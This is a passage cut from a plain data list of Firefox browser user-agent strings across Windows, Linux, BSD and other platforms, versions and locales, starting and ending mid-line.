(.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 (.NET CLR 4.0.20506)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729; .NET4.0C) FirePHP/0.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100405 Firefox/3.6.3plugin1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100806 Firefox/3.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b1) Gecko/20091014 Firefox/3.6b1 GTB5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a3pre) Gecko/20100306 Firefox3.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:2.0b10) Gecko/20110126 Firefox/4.0b10\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.8) Gecko/20100722 AskTbADAP/3.9.1.14019 Firefox/3.6.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 FirePHP/0.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; ro; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; rv:1.9.2) Gecko/20100105 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5\nMozilla/5.0 (Windows; U; Windows NT 6.1; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9\nMozilla/5.0 (Windows; U; Windows NT 6.1; sl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; en-US; rv:2.0.4) Gecko/20120718 AskTbAVR-IDW/3.12.5.17700 Firefox/14.0.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6\nMozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1.0\nMozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0\nMozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre\nMozilla/5.0 (Windows; Windows NT 5.1; es-ES; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre\nMozilla/5.0 (Windows x86; rv:19.0) Gecko/20100101 Firefox/19.0\nMozilla/5.0 (X11; Arch Linux i686; rv:2.0) Gecko/20110321 Firefox/4.0\nMozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (X11; FreeBSD i686) Firefox/3.6\nMozilla/5.0 (X11; FreeBSD x86_64; rv:2.0) Gecko/20100101 Firefox/3.6.12\nMozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0\nMozilla/5.0 (X11; Linux) Gecko Firefox/5.0\nMozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0\nMozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0a2) Gecko/20110524 Firefox/5.0a2\nMozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0) Gecko/20100101 Firefox/3.6.17 Firefox/3.6.17\nMozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0\nMozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20110518 Firefox/4.0.1\nMozilla/5.0 (X11; Linux i686; rv:2.0b10) Gecko/20100101 Firefox/4.0b10\nMozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20100101 Firefox/4.0b12pre\nMozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre\nMozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre\nMozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/3.6\nMozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0\nMozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (X11; Linux i686; U; pl; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0\nMozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110506 Firefox/4.0.1\nMozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4\nMozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre\nMozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre\nMozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre\nMozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\nMozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0\nMozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5\nMozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (X11; Mageia; Linux x86_64; rv:10.0.9) Gecko/20100101 Firefox/10.0.9\nMozilla/5.0 (X11; NetBSD amd64; rv:16.0) Gecko/20121102 Firefox/16.0\nMozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0\nMozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0\nMozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\nMozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0\nMozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1) Gecko/20090720 Firefox/3.5.1\nMozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.0.8) Gecko/20061116 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.12) Gecko/20051105 Firefox/1.0.8\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.5) Gecko/20041114 Firefox/1.0\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.3\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20060303 Firefox/1.0.3\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.2) Gecko/20060414 Firefox/1.5.0.2\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.8) Gecko/20061210 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.20) Gecko/20090225 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.20) Gecko/20090413 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.10) Gecko/20090624 Firefox/3.5\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.1) Gecko/20090703 Firefox/3.5\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9\nMozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9a2) Gecko/20080530 Firefox/3.0a2\nMozilla/5.0 (X11; U; FreeBSD i386; ja-JP; rv:1.9.1.8) Gecko/20100305 Firefox/3.5.8\nMozilla/5.0 (X11; U; FreeBSD i386; ru-RU; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3\nMozilla/5.0 (X11; U; Gentoo Linux x86_64; pl-PL) Gecko Firefox\nMozilla/5.0 (X11; U; Gentoo Linux x86_64; pl-PL; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux amd64; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux AMD64; en-US; rv:1.9.2.3) Gecko/20100403 Ubuntu/10.10 (maverick) Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0\nMozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)\nMozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.6.11\nMozilla/5.0 (X11; U; Linux; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.11) Gecko/20100720 Firefox/3.5.11\nMozilla/5.0 (X11; U; Linux; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux Gentoo i686; pl; rv:1.8.0.8) Gecko/20061219 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux Gentoo; pl-PL; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux i386; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (X11; U; Linux i686; bg; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.8.0.10) Gecko/20070313 Fedora/1.5.0.10-5.fc6 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11\nMozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.0.16) Gecko/2009121601 Ubuntu/9.04 (jaunty) Firefox/3.0.16\nMozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux i686; da-DK; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2\nMozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)\nMozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.6) Gecko/20050325 Firefox/1.0.2 (Debian package 1.0.2-1)\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.6) Gecko/20040207 Firefox/0.8\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 (Ubuntu package 1.0.8)\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1.0\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.6) Gecko/20050306 Firefox/1.0.1 (Debian package 1.0.1-2)\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.6) Gecko/20050322 Firefox/1.0.1\nMozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070719 CentOS/1.5.0.12-3.el5.centos Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 pango-text\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20060911 SUSE/1.5.0.8-0.2 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20061115 Ubuntu/dapper-security Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.14) Gecko/20080410 SUSE/2.0.0.14-0.1 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.14) Gecko/20080418 Ubuntu/7.10 (gutsy) Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.19) Gecko/20081213 SUSE/2.0.0.19-0.1 Firefox/2.0.0.19\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0.1+dfsg-2)\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061220 Firefox/2.0.0.1 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.22pre) Gecko/20090327 Ubuntu/7.10 (gutsy) Firefox/2.0.0.22pre\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.5) Gecko/20060911 SUSE/2.0.0.5-1.2 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.11) Gecko/2009062218 Gentoo Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070812 Ubuntu/8.04 (hardy) Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009082505 Red Hat/3.0.14-1.el5_4 Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010020400 SUSE/3.0.18-0.1.1 Firefox/3.0.18\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010021501 Firefox/3.0.18\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009041500 SUSE/3.0.9-2.2 Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Ubuntu/8.04 (hardy) Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 CentOS/3.6-2.el5.centos Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.15) Gecko/20110330 CentOS/3.6-1.el5.centos Firefox/3.6.15\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.18) Gecko/20110615 Ubuntu/10.10 (maverick) Firefox/3.6.18\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.21) Gecko/20110830 Ubuntu/10.10 (maverick) Firefox/3.6.21\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2)\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-GB; 